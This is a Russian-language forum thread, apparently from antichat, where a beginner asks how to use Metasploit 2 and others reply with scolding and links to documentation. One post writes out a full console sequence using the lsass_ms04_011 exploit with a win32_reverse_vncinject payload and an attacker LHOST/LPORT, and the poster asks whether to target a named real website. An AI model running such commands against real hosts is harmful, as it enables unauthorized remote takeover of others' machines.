![]() |
Metasploit 2
Братцы, помогите раздуплится над парами вопросов, связанных с этой прогой...
1. Когда настраиваю его на сервак: пишет, что-то там handler..... потом вырубается, вроде как бы ничего не нашел?? это так и надо, или я чего-то не так сделал??? 2. Любой эксплоит с payloads идущий с ним прицепом канают на любой сервак или нужно учитывать еще какие-нибудь особенности. Спасибо за помощь... 3. Цель нужно указывать конкретную, типа http://forum.antichat.ru/newthread.php?do=newthread&f=30 или можно просто http://antichat.ru Заранее спасибо! |
А причем Статьи???
|
Если честно, из твоей сумбурной речи мало чего понял. Учись четко описывать то, что хочешь сказать - и люди к тебе потянутся)
|
хоть и не в том форуме, еще и минус тебе влепили )
1) Ты вообще какую уязвимость используешь? 2) Эксплойты канают к определеннуму софту. И серваки тут ни при чем. Я могу ошибаться, но payloads - это вроде не сплоеты, а шеллкоды. Что это такое юзай гугл 3) все зависит от кокретного эксплоета. И адрес типа http://... может быть вообще ни причем. Вывод: рано тебе юзать metasploit и вообще сплоеты. Не понимаешь нифига! P.S.Используй гугл - я видел как минимум 3 статьи, где описывается как пользоваться метасплоетом. Кроме того - на этом форуме есть такая статья. Используй поиск по форуму со словами "wmf" или "wmf уязвимость". Сам придумай короче. И главный сюрприз для тебя:на video.antichat.ru есть видео, где показано как использовать wmf-уязвимость через метасплоет. И еще - прежде чем пользоваться сплоетами, потрудись хотя бы узнать что это. |
Спасибо хотя бы за просвящение... Буду стараться
|
Вот так попробую спросить, вроде получилось конкретно и в тему...
Юзанье Metasploit --msf > use lsass_ms04_011 --msf lsass_ms04_011 > set RHOST (сюда писать www.2day.kz или www.forum.2day.kz???) --RHOST -> some.vuln.host --msf lsass_ms04_011 > set PAYLOAD win32_reverse_vncinject --PAYLOAD -> win32_reverse_vncinject --msf lsass_ms04_011(win32_reverse_vncinject) > set LHOST your.own.ip --LHOST -> your.own.ip --msf lsass_ms04_011(win32_reverse_vncinject) > set LPORT (какой порт писать???) --LPORT -> 4321 --msf lsass_ms04_011(win32_reverse_vncinject) > exploit |
Офф сайт
http://metasploit.org/projects/Framework/documentation.html Вот по-русски http://www.securitylab.ru/analytics/216372.php http://www.securitylab.ru/analytics/216369.php есть еще и pdf. |
Спасибо T0p!!!
|
Вообще-то в "Похожих темах" есть все мои статьи, но если лень кликать там, то можно кликнуть в подписи на цифры...
|
| Время: 00:54 |